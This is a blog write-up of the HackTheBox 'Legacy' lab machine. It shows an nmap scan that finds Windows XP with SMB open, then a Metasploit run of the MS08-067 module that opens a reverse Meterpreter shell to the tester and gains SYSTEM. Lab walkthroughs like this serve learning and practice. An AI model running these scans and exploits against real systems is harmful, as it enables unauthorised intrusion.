Home Legacy writeup
Post
Cancel
Preview Image

Legacy writeup

Posted 2022-06-22 Updated 2022-06-24 2 min read

Summary

This was a very easy box that only required some basic google skills aswell as some knowledge of metasploit. let’s take a look.

Foothold & Privesc

Let’s start out by doing an nmap port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

┌──(bitis㉿workstation)-[~/htb/Machines/Legacy]
└─$ nmap -sC -sV 10.129.227.181
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 00:39 CEST
Nmap scan report for 10.129.227.181
Host is up (0.099s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 4d22h27m49s, deviation: 2h07m16s, median: 4d20h57m49s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:d1:40 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-06-28T01:37:03+03:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.75 seconds

The nmap scan reveals that the machine is running Windows XP as its’ OS. Ports 139 and 445 are also open, which are used for SMB. I initially thought the machine would be vulnerable to eternalblue, and indeed it is, but the metasploit module for Eternalblue that I found only had payloads for x64 architecture, which the target machine was not using. Searching for related vulnerabilities points us towards the metasploit module found described here. let’s try to use it.

1
2
3
4
5
6
7
8
9
10
11
12
13

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.17.182:4444 
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.17.182:4444 -> 10.129.227.181:1032) at 2022-06-23 01:03:26 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Rooted!

Writeup, HackTheBox
Easy-box windows metasploit
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents